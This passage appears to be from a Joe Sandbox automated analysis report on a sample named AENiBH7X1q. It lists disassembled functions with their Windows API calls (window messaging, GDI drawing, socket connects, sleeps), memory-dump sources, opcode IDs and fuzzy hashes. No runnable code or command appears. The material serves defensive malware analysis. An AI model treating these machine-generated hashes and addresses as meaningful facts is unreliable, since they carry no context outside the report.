                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1300944170-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(009B1A80,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(009B1A80,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 142311417-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0044955A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004495C1
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004495CE
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1843234404-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00445721
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004457A3
                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3087257052-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                                                                                                                                                                                                                                                                                                                • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 245547762-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2338827641-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyIcon
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3419509030-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 004175AE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 004175CE
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 004175DE
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(009B2D00), ref: 00417626
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
